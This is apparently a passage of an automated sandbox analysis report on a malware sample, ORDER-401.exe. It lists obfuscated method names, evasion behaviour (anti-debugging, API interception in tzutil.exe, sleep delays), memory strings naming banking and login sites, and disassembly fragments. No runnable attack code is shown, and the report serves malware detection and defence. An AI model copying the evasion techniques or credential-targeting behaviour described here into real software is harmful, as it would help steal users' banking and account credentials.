                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, swWcZnRwsr2OtsIY1v1.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fAINL1M2YM', 'PkQNIO7V1R', 'ioWNJ5Lpxb', 'OL1NNeDyNq', 'jB0N18IVcY', 'T4iNtq8tLc', 'RbmNvffMXc'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, CEVQbPUU2lsUMWDVTT.cs High entropy of concatenated method names: 'Dispose', 'U1ZRAT5TjL', 'sQJHKSh9ji', 'UPySPpN2K6', 'PIWRcQLTAg', 'R8KRzetni6', 'ProcessDialogKey', 'okrHTghYC8', 'WMXHRf86gZ', 'MLrHHOFYCP'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, SamS6iCuFEqkdcLqE4.cs High entropy of concatenated method names: 'hQNfsDp1OJ', 'YoIfiGgL1h', 'evVfADZORA', 'WdwfcRrPyg', 'iMs1BdOzvcaniaZ96jB', 'ReJBq0w5kKCBv0Ef7UE', 'xqbJ2OwbQG1WYJRX8TM'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, lFYCPHcw4vulGgMZ7v.cs High entropy of concatenated method names: 'UAZI8pfSiL', 'nJbIFgdn1e', 'nocI0k2KQP', 'bc5IgZIJnZ', 'iNiILtc3E0', 'qjWI5RfhPp', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, oGlpQvwpPvihUdfBbf.cs High entropy of concatenated method names: 'wNbRg7rgpH', 'ldHR5f1607', 'cSfR9bY7jX', 'idkRSUCbYT', 'wgQRfxggFw', 'W4sRmcYlqD', 'aHYIsMIPuefhw5In8N', 'KEVMs7EXayUU0Bc6aF', 'mDORRWijnM', 'OqMRavFpu7'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, H7I67HESfbY7jX0dkU.cs High entropy of concatenated method names: 'pXC8BVWtZR', 'h0M8QN5ICe', 'Bf48pDCy9Z', 'Ycv8Ee9png', 'sYR8fEX5JN', 'oqi8mpQfvj', 'MuC8beo2vM', 'xX68oLlDhY', 'ELD8LNpBYa', 'aJg8IvjAvO'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, L2NoNEZg4MRFvy56ar.cs High entropy of concatenated method names: 'OjLbiNp3fd', 'WQhbcceP8p', 'bipoTcOCXy', 'o85oRNSCBd', 'fhbbrgPvOc', 'ytObd7pSNL', 'xtHb3H1gHZ', 'jipbqdIfgv', 'EGDbCISsmL', 'k4QbjNWoGi'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, q7rgpHp9dHf1607YWr.cs High entropy of concatenated method names: 'JA0UqDwluw', 'EyeUCNFv9R', 'nQ3Uj8dTtZ', 'LebUhaXqXx', 'Qi0UneXr55', 'wsfUZs3bNV', 'xb5UsWMoee', 'c7BUiHxxbt', 'm4MUAeLafS', 'IOuUcXG6eX'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, jFwi4sYcYlqDWYH0Ge.cs High entropy of concatenated method names: 'S280xkPPIS', 'kpi0U0sibk', 'Hyr0F7noMh', 'iDF0gBZ1Wh', 'jia05DKIs6', 'vChFnGfcAY', 'IDyFZvTYEN', 'UdyFsO71kc', 'ntjFiAEXZo', 'IO0FAYWHYE'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, o0E95jsIfn1ZT5TjLd.cs High entropy of concatenated method names: 'ARnLfGSdIt', 'vTILb07CgD', 'ueRLLfXRww', 'bfLLJuKY36', 'rThL184qOd', 'JrVLv8vX2H', 'Dispose', 'siSo2Vnh0o', 'V1loUtZ3Ia', 'ThFo8KyoOK'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, HGHaKKzeS9M9EsO0B1.cs High entropy of concatenated method names: 'hNDIQuUA4U', 'UKJIpyxSjN', 'CWSIEb17fd', 'tLhIYFmcKL', 'Mw1IKsL8YH', 'w9EIWVYnMI', 'BROIPqcNo9', 'dD8IvVx5MA', 'qiaIu8h9Fc', 'TC9IMrU5Sk'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, dZTsUg38g9r2ovArmP.cs High entropy of concatenated method names: 'qIuypnulYW', 'pZgyEkfjDa', 'pPxyYIh8Xa', 'KimyK3lxqK', 'l92yWbIID8', 'gUHyPgKUMR', 'oFiyDualhs', 'ppWyXWPcT5', 'Fh3yesrhYm', 'k3MyrZ4mQc'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, yDeeW44Gfq5GeOq8R0.cs High entropy of concatenated method names: 'pp4gu01Wg9', 'aCKgMVJW61', 'D6ygGs6VCA', 'J3qgBuufng', 'VQkg7B5ZN1', 'OwpgQ4XHaY', 'vZUgkW4OIa', 'KMJgpLsPLQ', 'a4sgEU9AuR', 'LV3g6wRmhX'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, YRDVta5gJ5ilAYX9J5.cs High entropy of concatenated method names: 'jNWaxJwBUU', 'yCya2IdfXC', 'BN9aURddDr', 'Fyda8NHF8W', 'OGaaFMUvKs', 'Vd2a0IIDZs', 'FshagTlDyE', 'EEha53yMLF', 'HWGaOrQuNg', 'oUHa9kdBB8'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, XC2CCvRTw7FGef0XLM5.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MeoIrdXiOx', 'ulZIds6BfB', 'wCZI3tPlJg', 'whXIq8Al4B', 'an1ICTZNsH', 'HXYIjaAnjg', 'YK9IhdGks8'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, s8O6f0hQrrm7LD37lO.cs High entropy of concatenated method names: 'c7Hb9CF4x5', 'yGwbSTNOdM', 'ToString', 'NLNb2BPsW9', 'WA9bUch4TR', 'HvDb8eOuoW', 'caObFCFSNB', 'lpdb0Fj9qK', 'YQTbg2RJNH', 'blPb5cJ6VC'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, OghYC8AsMXf86gZ4Lr.cs High entropy of concatenated method names: 'AHeLYgUHXr', 'WvrLKkOxEU', 'paqLlmAsNZ', 'JqfLWqARXi', 'TQ4LPv0IJe', 'VwOLVmDKiG', 'AbiLDdy0ns', 'pPSLXbjgvE', 'kEHL49rEYE', 'VIdLeKahSm'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, aQtnXxRRhYtMLdqBg5n.cs High entropy of concatenated method names: 'k3eIcHWvwm', 'n5DIzVcQ2P', 'fNwJTDo1D2', 'wsaJRU8TsY', 'qQxJHulMru', 'pT3JaSWiZj', 'cL5Jww4ZR6', 'YaTJxWDc8c', 'dflJ2EFTNn', 'NiFJURH7n6'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, tO9lakD4N1gSofW9N9.cs High entropy of concatenated method names: 'w8Sg2l7cMi', 'Q7wg8loK6T', 'OHYg06p9ZU', 'NFF0c1FgSn', 'OiO0zWR5nI', 'cOwgTVejnr', 'mMIgRhZ4Yp', 'abwgHA8SAc', 'PwFgaIUIXF', 'XkMgwd8CEO'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, l96jCkWo0Qgw1Rruei.cs High entropy of concatenated method names: 'WgB0vJP6Dp', 'syP0uMabZ8', 'vtu0GSiosL', 'J9B0BKc0ER', 'IHk0Qayysw', 'FH10kTQ63K', 'PBu0E3iG8l', 'JIn06xXedO', 'TgKh2cmc8fXVVOKrC89', 'NkdDeKmS8SG77R5sHfJ'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, Dyt4SaHyhgDsWX8b9b.cs High entropy of concatenated method names: 'rl8GWtGrd', 'sroBggEpj', 'DjyQRJhfu', 'AvZkiomUQ', 'xbPEWbkTS', 'm4W6EXRHW', 'AXhiqe9rmG3vPt5X1I', 'jiZNo2XpVg8eaZDePP', 'L3hx3nPGvBET6qjb8r', 'w9HoBiDWi'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, swWcZnRwsr2OtsIY1v1.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fAINL1M2YM', 'PkQNIO7V1R', 'ioWNJ5Lpxb', 'OL1NNeDyNq', 'jB0N18IVcY', 'T4iNtq8tLc', 'RbmNvffMXc'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, CEVQbPUU2lsUMWDVTT.cs High entropy of concatenated method names: 'Dispose', 'U1ZRAT5TjL', 'sQJHKSh9ji', 'UPySPpN2K6', 'PIWRcQLTAg', 'R8KRzetni6', 'ProcessDialogKey', 'okrHTghYC8', 'WMXHRf86gZ', 'MLrHHOFYCP'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, SamS6iCuFEqkdcLqE4.cs High entropy of concatenated method names: 'hQNfsDp1OJ', 'YoIfiGgL1h', 'evVfADZORA', 'WdwfcRrPyg', 'iMs1BdOzvcaniaZ96jB', 'ReJBq0w5kKCBv0Ef7UE', 'xqbJ2OwbQG1WYJRX8TM'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, lFYCPHcw4vulGgMZ7v.cs High entropy of concatenated method names: 'UAZI8pfSiL', 'nJbIFgdn1e', 'nocI0k2KQP', 'bc5IgZIJnZ', 'iNiILtc3E0', 'qjWI5RfhPp', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, oGlpQvwpPvihUdfBbf.cs High entropy of concatenated method names: 'wNbRg7rgpH', 'ldHR5f1607', 'cSfR9bY7jX', 'idkRSUCbYT', 'wgQRfxggFw', 'W4sRmcYlqD', 'aHYIsMIPuefhw5In8N', 'KEVMs7EXayUU0Bc6aF', 'mDORRWijnM', 'OqMRavFpu7'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, H7I67HESfbY7jX0dkU.cs High entropy of concatenated method names: 'pXC8BVWtZR', 'h0M8QN5ICe', 'Bf48pDCy9Z', 'Ycv8Ee9png', 'sYR8fEX5JN', 'oqi8mpQfvj', 'MuC8beo2vM', 'xX68oLlDhY', 'ELD8LNpBYa', 'aJg8IvjAvO'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, L2NoNEZg4MRFvy56ar.cs High entropy of concatenated method names: 'OjLbiNp3fd', 'WQhbcceP8p', 'bipoTcOCXy', 'o85oRNSCBd', 'fhbbrgPvOc', 'ytObd7pSNL', 'xtHb3H1gHZ', 'jipbqdIfgv', 'EGDbCISsmL', 'k4QbjNWoGi'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, q7rgpHp9dHf1607YWr.cs High entropy of concatenated method names: 'JA0UqDwluw', 'EyeUCNFv9R', 'nQ3Uj8dTtZ', 'LebUhaXqXx', 'Qi0UneXr55', 'wsfUZs3bNV', 'xb5UsWMoee', 'c7BUiHxxbt', 'm4MUAeLafS', 'IOuUcXG6eX'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, jFwi4sYcYlqDWYH0Ge.cs High entropy of concatenated method names: 'S280xkPPIS', 'kpi0U0sibk', 'Hyr0F7noMh', 'iDF0gBZ1Wh', 'jia05DKIs6', 'vChFnGfcAY', 'IDyFZvTYEN', 'UdyFsO71kc', 'ntjFiAEXZo', 'IO0FAYWHYE'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, o0E95jsIfn1ZT5TjLd.cs High entropy of concatenated method names: 'ARnLfGSdIt', 'vTILb07CgD', 'ueRLLfXRww', 'bfLLJuKY36', 'rThL184qOd', 'JrVLv8vX2H', 'Dispose', 'siSo2Vnh0o', 'V1loUtZ3Ia', 'ThFo8KyoOK'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, HGHaKKzeS9M9EsO0B1.cs High entropy of concatenated method names: 'hNDIQuUA4U', 'UKJIpyxSjN', 'CWSIEb17fd', 'tLhIYFmcKL', 'Mw1IKsL8YH', 'w9EIWVYnMI', 'BROIPqcNo9', 'dD8IvVx5MA', 'qiaIu8h9Fc', 'TC9IMrU5Sk'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, dZTsUg38g9r2ovArmP.cs High entropy of concatenated method names: 'qIuypnulYW', 'pZgyEkfjDa', 'pPxyYIh8Xa', 'KimyK3lxqK', 'l92yWbIID8', 'gUHyPgKUMR', 'oFiyDualhs', 'ppWyXWPcT5', 'Fh3yesrhYm', 'k3MyrZ4mQc'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, yDeeW44Gfq5GeOq8R0.cs High entropy of concatenated method names: 'pp4gu01Wg9', 'aCKgMVJW61', 'D6ygGs6VCA', 'J3qgBuufng', 'VQkg7B5ZN1', 'OwpgQ4XHaY', 'vZUgkW4OIa', 'KMJgpLsPLQ', 'a4sgEU9AuR', 'LV3g6wRmhX'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, YRDVta5gJ5ilAYX9J5.cs High entropy of concatenated method names: 'jNWaxJwBUU', 'yCya2IdfXC', 'BN9aURddDr', 'Fyda8NHF8W', 'OGaaFMUvKs', 'Vd2a0IIDZs', 'FshagTlDyE', 'EEha53yMLF', 'HWGaOrQuNg', 'oUHa9kdBB8'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, XC2CCvRTw7FGef0XLM5.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MeoIrdXiOx', 'ulZIds6BfB', 'wCZI3tPlJg', 'whXIq8Al4B', 'an1ICTZNsH', 'HXYIjaAnjg', 'YK9IhdGks8'
                Source: C:\Users\user\Desktop\ORDER-401.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tzutil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: ORDER-401.exe PID: 7724, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Users\user\Desktop\ORDER-401.exe Memory allocated: 2A70000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ORDER-401.exe Memory allocated: 2BF0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ORDER-401.exe Memory allocated: 4BF0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ORDER-401.exe Memory allocated: 7CC0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ORDER-401.exe Memory allocated: 7420000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ORDER-401.exe Memory allocated: 8CC0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ORDER-401.exe Memory allocated: 9CC0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0158096E rdtsc 4_2_0158096E
                Source: C:\Users\user\Desktop\ORDER-401.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\ORDER-401.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\tzutil.exe API coverage: 2.6 %
                Source: C:\Users\user\Desktop\ORDER-401.exe TID: 7744 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 4472 Thread sleep count: 32 > 30
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 4472 Thread sleep time: -64000s >= -30000s
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe TID: 5628 Thread sleep time: -45000s >= -30000s
                Source: C:\Windows\SysWOW64\tzutil.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_028CC9D0 FindFirstFileW,FindNextFileW,FindClose, 8_2_028CC9D0
                Source: C:\Users\user\Desktop\ORDER-401.exe Thread delayed: delay time: 922337203685477
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nge Transaction PasswordVMware20,11696494690^
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: entralVMware20,11696494690
                Source: UQ63g7r-.8.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: COM.HKVMware20,11696494690
                Source: UQ63g7r-.8.dr Binary or memory string: discord.comVMware20,11696494690f
                Source: UQ63g7r-.8.dr Binary or memory string: AMC password management pageVMware20,11696494690
                Source: UQ63g7r-.8.dr Binary or memory string: outlook.office.comVMware20,11696494690s
                Source: UQ63g7r-.8.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: UQ63g7r-.8.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: UQ63g7r-.8.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: UQ63g7r-.8.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: UQ63g7r-.8.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
                Source: UQ63g7r-.8.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,
                Source: UQ63g7r-.8.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: UQ63g7r-.8.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
                Source: UQ63g7r-.8.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: n.utiitsl.comVMware20,11696494690h
                Source: UQ63g7r-.8.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: UQ63g7r-.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: UQ63g7r-.8.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nteractive Brokers - HKVMware20,11696494690]
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rs.comVMware20,11696494690
                Source: firefox.exe, 0000000B.00000002.2400295346.000001D163C5C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: UQ63g7r-.8.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,1169649<[_
                Source: UQ63g7r-.8.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: UQ63g7r-.8.dr Binary or memory string: tasks.office.comVMware20,11696494690o
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .comVMware20,11696494690x
                Source: UQ63g7r-.8.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ansaction PasswordVMware20,11696494690x
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: block list test formVMware20,11696494690
                Source: UQ63g7r-.8.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: UQ63g7r-.8.dr Binary or memory string: dev.azure.comVMware20,11696494690j
                Source: UQ63g7r-.8.dr Binary or memory string: global block list test formVMware20,11696494690
                Source: UQ63g7r-.8.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: UQ63g7r-.8.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
                Source: UQ63g7r-.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: PcwrDoOfOMD.exe, 00000009.00000002.3255934217.0000000000B5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluuq
                Source: UQ63g7r-.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: agement pageVMware20,11696494690
                Source: UQ63g7r-.8.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: UQ63g7r-.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sswords blocklistVMware20,11696494690
                Source: tzutil.exe, 00000008.00000002.3255491198.0000000002B9D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt'SZ
                Source: UQ63g7r-.8.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: UQ63g7r-.8.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\ORDER-401.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\ORDER-401.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\tzutil.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0158096E rdtsc 4_2_0158096E
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_00417B63 LdrLoadDll, 4_2_00417B63
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01546154 mov eax, dword ptr fs:[00000030h] 4_2_01546154
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01546154 mov eax, dword ptr fs:[00000030h] 4_2_01546154
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0153C156 mov eax, dword ptr fs:[00000030h] 4_2_0153C156
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015D8158 mov eax, dword ptr fs:[00000030h] 4_2_015D8158
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015D4144 mov eax, dword ptr fs:[00000030h] 4_2_015D4144
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015D4144 mov eax, dword ptr fs:[00000030h] 4_2_015D4144
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015D4144 mov ecx, dword ptr fs:[00000030h] 4_2_015D4144
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015D4144 mov eax, dword ptr fs:[00000030h] 4_2_015D4144
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015D4144 mov eax, dword ptr fs:[00000030h] 4_2_015D4144
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015EA118 mov ecx, dword ptr fs:[00000030h] 4_2_015EA118
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015EA118 mov eax, dword ptr fs:[00000030h] 4_2_015EA118
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015EA118 mov eax, dword ptr fs:[00000030h] 4_2_015EA118
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015EA118 mov eax, dword ptr fs:[00000030h] 4_2_015EA118
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015EE10E mov eax, dword ptr fs:[00000030h] 4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015EE10E mov ecx, dword ptr fs:[00000030h] 4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015EE10E mov eax, dword ptr fs:[00000030h] 4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015EE10E mov eax, dword ptr fs:[00000030h] 4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015EE10E mov ecx, dword ptr fs:[00000030h] 4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015EE10E mov eax, dword ptr fs:[00000030h] 4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015EE10E mov eax, dword ptr fs:[00000030h] 4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015EE10E mov ecx, dword ptr fs:[00000030h] 4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015EE10E mov eax, dword ptr fs:[00000030h] 4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015EE10E mov ecx, dword ptr fs:[00000030h] 4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01570124 mov eax, dword ptr fs:[00000030h] 4_2_01570124
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01600115 mov eax, dword ptr fs:[00000030h] 4_2_01600115
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_016161E5 mov eax, dword ptr fs:[00000030h] 4_2_016161E5
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015BE1D0 mov eax, dword ptr fs:[00000030h] 4_2_015BE1D0
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015BE1D0 mov eax, dword ptr fs:[00000030h] 4_2_015BE1D0
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015BE1D0 mov ecx, dword ptr fs:[00000030h] 4_2_015BE1D0
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015BE1D0 mov eax, dword ptr fs:[00000030h] 4_2_015BE1D0
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015BE1D0 mov eax, dword ptr fs:[00000030h] 4_2_015BE1D0
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_016061C3 mov eax, dword ptr fs:[00000030h] 4_2_016061C3
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_016061C3 mov eax, dword ptr fs:[00000030h] 4_2_016061C3
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015701F8 mov eax, dword ptr fs:[00000030h] 4_2_015701F8
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015C019F mov eax, dword ptr fs:[00000030h] 4_2_015C019F
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015C019F mov eax, dword ptr fs:[00000030h] 4_2_015C019F
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015C019F mov eax, dword ptr fs:[00000030h] 4_2_015C019F
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015C019F mov eax, dword ptr fs:[00000030h] 4_2_015C019F
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0153A197 mov eax, dword ptr fs:[00000030h] 4_2_0153A197
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0153A197 mov eax, dword ptr fs:[00000030h] 4_2_0153A197
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0153A197 mov eax, dword ptr fs:[00000030h] 4_2_0153A197
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015FC188 mov eax, dword ptr fs:[00000030h] 4_2_015FC188
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015FC188 mov eax, dword ptr fs:[00000030h] 4_2_015FC188
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01580185 mov eax, dword ptr fs:[00000030h] 4_2_01580185
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015E4180 mov eax, dword ptr fs:[00000030h] 4_2_015E4180
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015E4180 mov eax, dword ptr fs:[00000030h] 4_2_015E4180
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_01542050 mov eax, dword ptr fs:[00000030h] 4_2_01542050
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_015C6050 mov eax, dword ptr fs:[00000030h] 4_2_015C6050
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0156C073 mov eax, dword ptr fs:[00000030h] 4_2_0156C073
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0155E016 mov eax, dword ptr fs:[00000030h] 4_2_0155E016
                Source: C:\Users\user\Desktop\ORDER-401.exe Code function: 4_2_0155E016 mov eax, dword ptr fs:[00000030h] 4_2_0155E016
